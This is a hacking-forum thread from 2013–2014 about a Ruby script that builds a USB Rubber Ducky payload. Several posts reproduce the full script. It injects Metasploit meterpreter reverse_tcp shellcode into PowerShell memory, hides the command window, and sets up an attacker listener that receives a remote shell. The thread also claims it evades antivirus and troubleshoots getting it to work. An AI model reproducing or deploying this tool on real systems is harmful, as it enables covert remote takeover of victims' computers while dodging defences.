b00stfr3ak Posted August 19, 2013 Share Posted August 19, 2013 (edited) Hey, I created a script that will create a reverse meterpreter connection all in memory using powershell. This is the same attack that SET uses with the teensy board, so I thought I would bring it over to the ducky. The code is at https://github.com/b00stfr3ak/Powershell-Reverse-Rubber-Ducky Seems like github has messed with the formatting a little but shouldn't be a problem. Try it out and let me know what you guys think. EDIT: Added what the script looks like when ran. ruby reverse_powershell_ducky.rb [!] Enter the host ip to listen on: 192.168.1.1 [+] Using 192.168.1.1 as server [!] Enter the port you would like to use or leave blank for [443]: 8080 [+] Using 8080 [*] Generating shellcode [*] Writing to file [+] File Complete [!] Would you like to start the listener?[yes/no] no [*] Compile powershell_reverse_ducky.txt with duckencode.jar [*] Good Bye! or ruby reverse_powershell_ducky.rb [!] Enter the host ip to listen on: 192.168.1.1 [+] Using 192.168.1.1 as server [!] Enter the port you would like to use or leave blank for [443]: [+] Using 443 [*] Generating shellcode [*] Writing to file [+] File Complete [!] Would you like to start the listener?[yes/no] yes [*] Compile powershell_reverse_ducky.txt with duckencode.jar [*] Setting up Metasploit this may take a moment Edited August 20, 2013 by b00stfr3ak Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted August 19, 2013 Share Posted August 19, 2013 Sweet script! Did you try out the Simple Ducky Payload Generator? https://forums.hak5.org/index.php?/topic/28969-release-simple-ducky-payload-generator-v111-international-key-mappingkali-compatiblecustom-payload-builder/ I'm not sure if it uses the same technique but it's another great resource. Quote Link to comment Share on other sites More sharing options...
overwraith Posted August 19, 2013 Share Posted August 19, 2013 I've never used ruby before, I ran the script, now I don't know where the script dumped the file to. Am I looking for a .txt, or a .bin? Quote Link to comment Share on other sites More sharing options...
no42 Posted August 20, 2013 Share Posted August 20, 2013 should be called: powershell_reverse_ducky.txt Quote Link to comment Share on other sites More sharing options...
overwraith Posted August 20, 2013 Share Posted August 20, 2013 (edited) I've also never used metasploit before, which is why I didn't know that I would have needed it to run this script. At least I now know what went wrong, I will fix my error promptly. J:\Powershell-Reverse-Rubber-Ducky-master>reverse_powershell_ducky.rb [!] Enter the host ip to listen on: 192.168.1.1 [+] Using 192.168.1.1 as server [!] Enter the port you would like to use or leave blank for [443]: 8080 [+] Using 8080 [*] Generating shellcode J:/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:44:in ``': No such file or directory - /opt/metasploit-framework/./msfvenom --payload wind ows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=8080 C (Errno::ENOENT) from J:/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky. rb:44:in `shellcode_gen' from J:/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky. rb:83:in `<main>' J:\Powershell-Reverse-Rubber-Ducky-master> Edited August 20, 2013 by overwraith Quote Link to comment Share on other sites More sharing options...
b00stfr3ak Posted August 20, 2013 Author Share Posted August 20, 2013 (edited) Sweet script! Did you try out the Simple Ducky Payload Generator? https://forums.hak5.org/index.php?/topic/28969-release-simple-ducky-payload-generator-v111-international-key-mappingkali-compatiblecustom-payload-builder/ I'm not sure if it uses the same technique but it's another great resource. Looks like they use vb to create an exe and execute that, which may be caught by av when created. But any ways it was fun writing it. I have something planned that I hope to release this weekend. Edited August 20, 2013 by b00stfr3ak Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted August 20, 2013 Share Posted August 20, 2013 What technique are you using to drop the shell? Quote Link to comment Share on other sites More sharing options...
b00stfr3ak Posted August 20, 2013 Author Share Posted August 20, 2013 The script takes a powershell command with meterpreter shellcode and base64 encodes it. From there the ducky launches cmd, and then powershell -encodedCommand (payload) directly into memory. This bypasses all AV. The powershell technique was created by Matthew Graeber http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html The downgrade from x64 to x86 for powershell was created by Dave Kennedy https://www.trustedsec.com/may-2013/native-powershell-x86-shellcode-injection-on-64-bit-platforms/ Quote Link to comment Share on other sites More sharing options...
TeCHemically Posted August 28, 2013 Share Posted August 28, 2013 Great script, I am super excited to test this one out :D One problem though for me so far. Just like overwraith's issue. I have metasploit fully updated as of less than 5 mintues ago from the time of this post and have postgresql and metasploit services started. I am still getting the below error: [*] Generating shellcode/root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:44:in ``': No such file or directory - /opt/metasploit-framework/./msfvenom --payload windows/meterpreter/reverse_tcp LHOST=71.81.200.174 LPORT=443 C (Errno::ENOENT) from /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:44:in `shellcode_gen' from /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:83:in `<main>' Do I need to have the msfconsole up? Why am I getting this error? Thanks to all who reply! :) Quote Link to comment Share on other sites More sharing options...
b00stfr3ak Posted August 28, 2013 Author Share Posted August 28, 2013 Great script, I am super excited to test this one out :D One problem though for me so far. Just like overwraith's issue. I have metasploit fully updated as of less than 5 mintues ago from the time of this post and have postgresql and metasploit services started. I am still getting the below error: [*] Generating shellcode /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:44:in ``': No such file or directory - /opt/metasploit-framework/./msfvenom --payload windows/meterpreter/reverse_tcp LHOST=71.81.200.174 LPORT=443 C (Errno::ENOENT) from /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:44:in `shellcode_gen' from /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:83:in `<main>' Do I need to have the msfconsole up? Why am I getting this error? Thanks to all who reply! :) Hey thanks for trying it out. I have updated the script to support default Kali install. If you are still having issues please let me know. Quote Link to comment Share on other sites More sharing options...
TeCHemically Posted August 29, 2013 Share Posted August 29, 2013 (edited) Hey thanks for trying it out. I have updated the script to support default Kali install. If you are still having issues please let me know. No, thank you for taking the time to produce this! I ran it this morning and all appears well. What directory does the txt file get created in?...Nevermind, I found it in home directory. Thanks again! :) Edited August 29, 2013 by TeCHemically Quote Link to comment Share on other sites More sharing options...
411Hall Posted August 30, 2013 Share Posted August 30, 2013 Awesome script dude, I also had no idea about the encodedCommand cmdlet. Think I have some changes to make to the DuckToolkit! Quote Link to comment Share on other sites More sharing options...
TeCHemically Posted August 30, 2013 Share Posted August 30, 2013 (edited) Hey thanks for trying it out. I have updated the script to support default Kali install. If you are still having issues please let me know. Everything appears to have been successful on the client side; but I dont get the shell on my VPS. I am using other 443 meterpreter reverse shells in the same environment successfully so I know it is not a network issue. EDIT: re-ran everything and now all is well. Great job!! If only there was a way to make this persistent. Edited August 30, 2013 by TeCHemically Quote Link to comment Share on other sites More sharing options...
b00stfr3ak Posted September 1, 2013 Author Share Posted September 1, 2013 Yeah, all depends on what the priv you ran the script under, so UAC could be added and from there you could do what ever you wanted to the system. Quote Link to comment Share on other sites More sharing options...
DrDinosaur Posted September 13, 2013 Share Posted September 13, 2013 Great script! I made a video showing it off: Quote Link to comment Share on other sites More sharing options...
b00stfr3ak Posted September 18, 2013 Author Share Posted September 18, 2013 Great script! I made a video showing it off: Nice video! What do you use to record? Check out the Ducky Tool Kit I made https://forums.hak5.org/index.php?/topic/30333-power-ducky-toolkit/ Quote Link to comment Share on other sites More sharing options...
DrDinosaur Posted September 20, 2013 Share Posted September 20, 2013 Nice video! What do you use to record? Check out the Ducky Tool Kit I made https://forums.hak5.org/index.php?/topic/30333-power-ducky-toolkit/ I used Camtasia. And nice toolkit there :) Quote Link to comment Share on other sites More sharing options...
TeCHemically Posted April 15, 2014 Share Posted April 15, 2014 (edited) This script is now failing in Kali. I have tried on 2 separate install that are up to date and get the following error: [*] Generating shellcodeNo platform was selected, choosing Msf::Module::Platform::Windows from the payloadNo Arch selected, selecting Arch: x86 from the payloadFound 0 compatible encodersreverse_powershell_ducky.rb:51:in `gsub': invalid byte sequence in UTF-8 (ArgumentError) from reverse_powershell_ducky.rb:51:in `clean_shellcode' from reverse_powershell_ducky.rb:45:in `shellcode_gen' from reverse_powershell_ducky.rb:90:in `<main>' Any help is greatly appreciated as this is my go to method in testing due to its AV evasion ability Also, would it be possible to have this script accept domain names as well as IP addresses? Edited April 15, 2014 by TeCHemically Quote Link to comment Share on other sites More sharing options...
b00stfr3ak Posted May 3, 2014 Author Share Posted May 3, 2014 This script is now failing in Kali. I have tried on 2 separate install that are up to date and get the following error: [*] Generating shellcode No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload Found 0 compatible encoders reverse_powershell_ducky.rb:51:in `gsub': invalid byte sequence in UTF-8 (ArgumentError) from reverse_powershell_ducky.rb:51:in `clean_shellcode' from reverse_powershell_ducky.rb:45:in `shellcode_gen' from reverse_powershell_ducky.rb:90:in `<main>' Any help is greatly appreciated as this is my go to method in testing due to its AV evasion ability Also, would it be possible to have this script accept domain names as well as IP addresses? Sorry havn't checked this in a long time. I'll try to take a look tonight, should be simple. Take a look at https://forums.hak5.org/index.php?/topic/30333-power-ducky-toolkit/ for the time being, fast meterpreter is the same concept but finishes in seconds. I plan on re-writting that because the code is real bad. Does the script fail with DNS names? It should just pass everything to metasploit. Quote Link to comment Share on other sites More sharing options...
MB60893 Posted May 10, 2014 Share Posted May 10, 2014 Looks like I'll have to get back into some metasploit work! Quote Link to comment Share on other sites More sharing options...
b00stfr3ak Posted May 11, 2014 Author Share Posted May 11, 2014 I have fixed the issue with msfvenom, let me know if you run into any more issues. Quote Link to comment Share on other sites More sharing options...
Haxineer1337 Posted May 24, 2014 Share Posted May 24, 2014 Can't we just use a downloader and a batch file? Also, if we use a remote ip can we get remote access? Quote Link to comment Share on other sites More sharing options...
SystemCrash86 Posted May 25, 2014 Share Posted May 25, 2014 Ducky reverse shell doesn't workI have used the following script, that i know used to work and now doesn't.I modified it abit from the original download to hide the cmd window as the shellcode is being typed.It worked like a charm but now its not working. Here is the script: #!/usr/bin/env ruby # Thanks to @mattifestation exploit-monday.com and Dave Kennedy. # Written by James Cook @b00stfr3ak44 require 'base64' def print_error(text) print "\e[31m[-]\e[0m #{text}" end def print_success(text) print "\e[32m[+]\e[0m #{text}" end def print_info(text) print "\e[34m[*]\e[0m #{text}" end def get_input(text) print "\e[33m[!]\e[0m #{text}" end def get_host() host_name = [(get_input("Enter the host ip to listen on: ") ), $stdin.gets.rstrip][1] ip = host_name.split('.') if ip[0] == nil or ip[1] == nil or ip[2] == nil or ip[3] == nil print_error("Not a valid IP\n") get_host() end print_success("Using #{host_name} as server\n") return host_name end def get_port() port = [(get_input("Enter the port you would like to use or leave blank for [443]: ") ), $stdin.gets.rstrip][1] if port == '' port = '443' print_success("Using #{port}\n") return port elsif not (1..65535).cover?(port.to_i) print_error("Not a valid port\n") sleep(1) port() else print_success("Using #{port}\n") return port end end def shellcode_gen(msf_path,host,port) print_info("Generating shellcode\n") execute = `#{msf_path}./msfvenom --payload #{@set_payload} LHOST=#{host} LPORT=#{port} C` shellcode = clean_shellcode(execute) powershell_command = %($1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = #{shellcode};$size = 0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + "\\syswow64\\WindowsPowerShell\\v1.0\\powershell";$cmd = "-nop -noni -enc";iex "& $x86 $cmd $gq"}else{$cmd = "-nop -noni -enc";iex "& powershell $cmd $gq";}) encoded_command = Base64.encode64(powershell_command.encode("utf-16le")).delete("\r\n") return encoded_command end def clean_shellcode(shellcode) shellcode = shellcode.gsub('\\',",0") shellcode = shellcode.delete("+") shellcode = shellcode.delete('"') shellcode = shellcode.delete("\n") shellcode = shellcode.delete("\s") shellcode[0..4] = '' return shellcode end def ducky_setup(encoded_command) print_info("Writing to file\n") File.open("powershell_reverse_ducky.txt",'w') {|f| f.write("DELAY 2000\nGUI r\nDELAY 500\nSTRING cmd /Q /D /T:7F /F:OFF /V:ON /K\nDELAY 500\nENTER\nDELAY 750\nALT SPACE\nSTRING M\nDOWNARROW\nREPEAT 100\nENTER\nSTRING powershell -nop -wind hidden -noni -enc #{encoded_command}\nENTER")} print_success("File Complete\n") end def metasploit_setup(msf_path,host,port) print_info("Setting up Metasploit this may take a moment\n") rc_file = "msf_listener.rc" file = File.open("#{rc_file}",'w') file.write("use exploit/multi/handler\n") file.write("set PAYLOAD #{@set_payload}\n") file.write("set LHOST #{host}\n") file.write("set LPORT #{port}\n") file.write("set EnableStageEncoding true\n") file.write("set ExitOnSession false\n") file.write("exploit -j") file.close system("#{msf_path}./msfconsole -r #{rc_file}") end begin if File.exist?('/usr/bin/msfvenom') msf_path = '/usr/bin/' elsif File.exist?("/opt/metasploit-framework/msfvenom") msf_path = ('/opt/metasploit-framework/') else print_error("Metasploit Not Found!") exit end @set_payload = "windows/meterpreter/reverse_tcp" host = get_host() port = get_port() encoded_command = shellcode_gen(msf_path,host,port) ducky_setup(encoded_command) msf_setup = [(get_input("Would you like to start the listener?[yes/no] ") ), $stdin.gets.rstrip][1] print_info("Compile powershell_reverse_ducky.txt with duckencode.jar\n") metasploit_setup(msf_path,host,port) if msf_setup == 'yes' print_info("Good Bye!\n") end And i get the following error: root@SystemCrash86:/usr/share/simple-ducky/payloads# ./reverse_powershell_ducky2.rb[!] Enter the host ip to listen on: 192.168.0.2[+] Using 192.168.0.2 as server[!] Enter the port you would like to use or leave blank for [443]: 443[+] Using 443 [*] Generating shellcodeNo platform was selected, choosing Msf::Module::Platform::Windows from the payloadNo Arch selected, selecting Arch: x86 from the payloadFound 0 compatible encoders./reverse_powershell_ducky2.rb:51:in `gsub': invalid byte sequence in UTF-8 (ArgumentError) from ./reverse_powershell_ducky2.rb:51:in `clean_shellcode' from ./reverse_powershell_ducky2.rb:45:in `shellcode_gen' from ./reverse_powershell_ducky2.rb:90:in `<main>'root@SystemCrash86:/usr/share/simple-ducky/payloads# Everything is uptodate and this script used to work but now i get those errors Quote Link to comment Share on other sites More sharing options...
b00stfr3ak Posted May 27, 2014 Author Share Posted May 27, 2014 (edited) Ducky reverse shell doesn't work I have used the following script, that i know used to work and now doesn't. I modified it abit from the original download to hide the cmd window as the shellcode is being typed. It worked like a charm but now its not working. Here is the script: #!/usr/bin/env ruby # Thanks to @mattifestation exploit-monday.com and Dave Kennedy. # Written by James Cook @b00stfr3ak44 require 'base64' def print_error(text) print "\e[31m[-]\e[0m #{text}" end def print_success(text) print "\e[32m[+]\e[0m #{text}" end def print_info(text) print "\e[34m[*]\e[0m #{text}" end def get_input(text) print "\e[33m[!]\e[0m #{text}" end def get_host() host_name = [(get_input("Enter the host ip to listen on: ") ), $stdin.gets.rstrip][1] ip = host_name.split('.') if ip[0] == nil or ip[1] == nil or ip[2] == nil or ip[3] == nil print_error("Not a valid IP\n") get_host() end print_success("Using #{host_name} as server\n") return host_name end def get_port() port = [(get_input("Enter the port you would like to use or leave blank for [443]: ") ), $stdin.gets.rstrip][1] if port == '' port = '443' print_success("Using #{port}\n") return port elsif not (1..65535).cover?(port.to_i) print_error("Not a valid port\n") sleep(1) port() else print_success("Using #{port}\n") return port end end def shellcode_gen(msf_path,host,port) print_info("Generating shellcode\n") execute = `#{msf_path}./msfvenom --payload #{@set_payload} LHOST=#{host} LPORT=#{port} C` shellcode = clean_shellcode(execute) powershell_command = %($1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc = #{shellcode};$size = 0x1000;if ($sc.Length -gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$gq = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRoot + "\\syswow64\\WindowsPowerShell\\v1.0\\powershell";$cmd = "-nop -noni -enc";iex "& $x86 $cmd $gq"}else{$cmd = "-nop -noni -enc";iex "& powershell $cmd $gq";}) encoded_command = Base64.encode64(powershell_command.encode("utf-16le")).delete("\r\n") return encoded_command end def clean_shellcode(shellcode) shellcode = shellcode.gsub('\\',",0") shellcode = shellcode.delete("+") shellcode = shellcode.delete('"') shellcode = shellcode.delete("\n") shellcode = shellcode.delete("\s") shellcode[0..4] = '' return shellcode end def ducky_setup(encoded_command) print_info("Writing to file\n") File.open("powershell_reverse_ducky.txt",'w') {|f| f.write("DELAY 2000\nGUI r\nDELAY 500\nSTRING cmd /Q /D /T:7F /F:OFF /V:ON /K\nDELAY 500\nENTER\nDELAY 750\nALT SPACE\nSTRING M\nDOWNARROW\nREPEAT 100\nENTER\nSTRING powershell -nop -wind hidden -noni -enc #{encoded_command}\nENTER")} print_success("File Complete\n") end def metasploit_setup(msf_path,host,port) print_info("Setting up Metasploit this may take a moment\n") rc_file = "msf_listener.rc" file = File.open("#{rc_file}",'w') file.write("use exploit/multi/handler\n") file.write("set PAYLOAD #{@set_payload}\n") file.write("set LHOST #{host}\n") file.write("set LPORT #{port}\n") file.write("set EnableStageEncoding true\n") file.write("set ExitOnSession false\n") file.write("exploit -j") file.close system("#{msf_path}./msfconsole -r #{rc_file}") end begin if File.exist?('/usr/bin/msfvenom') msf_path = '/usr/bin/' elsif File.exist?("/opt/metasploit-framework/msfvenom") msf_path = ('/opt/metasploit-framework/') else print_error("Metasploit Not Found!") exit end @set_payload = "windows/meterpreter/reverse_tcp" host = get_host() port = get_port() encoded_command = shellcode_gen(msf_path,host,port) ducky_setup(encoded_command) msf_setup = [(get_input("Would you like to start the listener?[yes/no] ") ), $stdin.gets.rstrip][1] print_info("Compile powershell_reverse_ducky.txt with duckencode.jar\n") metasploit_setup(msf_path,host,port) if msf_setup == 'yes' print_info("Good Bye!\n") end And i get the following error: root@SystemCrash86:/usr/share/simple-ducky/payloads# ./reverse_powershell_ducky2.rb [!] Enter the host ip to listen on: 192.168.0.2 [+] Using 192.168.0.2 as server [!] Enter the port you would like to use or leave blank for [443]: 443 [+] Using 443 [*] Generating shellcode No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload Found 0 compatible encoders ./reverse_powershell_ducky2.rb:51:in `gsub': invalid byte sequence in UTF-8 (ArgumentError) from ./reverse_powershell_ducky2.rb:51:in `clean_shellcode' from ./reverse_powershell_ducky2.rb:45:in `shellcode_gen' from ./reverse_powershell_ducky2.rb:90:in `<main>' root@SystemCrash86:/usr/share/simple-ducky/payloads# Everything is uptodate and this script used to work but now i get those errors Please do a git pull or just re clone the repo this was fixed last week Can't we just use a downloader and a batch file? Also, if we use a remote ip can we get remote access? Not sure what you are asking. This holds the psh script on a web server downloads it in memory and executes it on the machine. Edited May 27, 2014 by b00stfr3ak Quote Link to comment Share on other sites More sharing options...
SystemCrash86 Posted May 27, 2014 Share Posted May 27, 2014 I did a fresh clean install of Simple-Ducky Payload Generator. Then i used git clone on https://github.com/b00stfr3ak/Powershell-Reverse-Rubber-Ducky.git to get the reverse_powershell_ducky.rb. Note that everything is upto date and freshly installed and that this script has been cloned from the git hub and i have not made any changes to this one. This script also worked flawlessly on Kali linux 3.12-kali1-amd64 iso without problems but since the update to 3.14-kali1-amd64 it no longer works.root@SystemCrash86:/usr/share/simple-ducky# ./update.shAlready up-to-date.Entering 'misc/dbd'Switched to branch 'master'Entering 'misc/dbd'Already up-to-date.# On branch masternothing to commit (working directory clean)root@SystemCrash86:~/Powershell-Reverse-Rubber-Ducky# ./reverse_powershell_ducky.rbEnter the host ip to listen on: 192.168.0.2[+] Using 192.168.0.2 as serverPort you would like to use or leave blank for [443]:[+] Using 443 [*] Generating shellcodeNo platform was selected, choosing Msf::Module::Platform::Windows from the payloadNo Arch selected, selecting Arch: x86 from the payloadFound 0 compatible encoders [*] Writing to file[+] File CompleteWould you like to start the listener?[yes/no] yes [*] Compile powershell_reverse_ducky.txt with duckencode.jar [*] Setting up Metasploit this may take a moment ______________________________________________________________________________| || METASPLOIT CYBER MISSILE COMMAND V4 ||______________________________________________________________________________| \ / / \ . / / x \ / / \ / + / \ + / / * / / / . / X / / X / ### / # % # / ### . / . / . * . / * + * ^#### __ __ __ ####### __ __ __ ######## / \ / \ / \ ########### / \ / \ / \ ##################################################################################################################################################################### WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF #################################################################################http://metasploit.proValidate lots of vulnerabilities to demonstrate exposurewith Metasploit Pro -- Learn more on http://rapid7.com/metasploit =[ metasploit v4.9.2-2014052101 [core:4.9 api:1.0] ]+ -- --=[ 1311 exploits - 784 auxiliary - 221 post ]+ -- --=[ 335 payloads - 35 encoders - 8 nops ]+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] [*] Processing msf_listener.rc for ERB directives.resource (msf_listener.rc)> use exploit/multi/handlerresource (msf_listener.rc)> set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpresource (msf_listener.rc)> set LHOST 192.168.0.2LHOST => 192.168.0.2resource (msf_listener.rc)> set LPORT 443LPORT => 443resource (msf_listener.rc)> set EnableStageEncoding trueEnableStageEncoding => trueresource (msf_listener.rc)> set ExitOnSession falseExitOnSession => falseresource (msf_listener.rc)> exploit -j[-] Exploit failed: undefined method `const_defined?' for nil:NilClassmsf exploit(handler) > Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.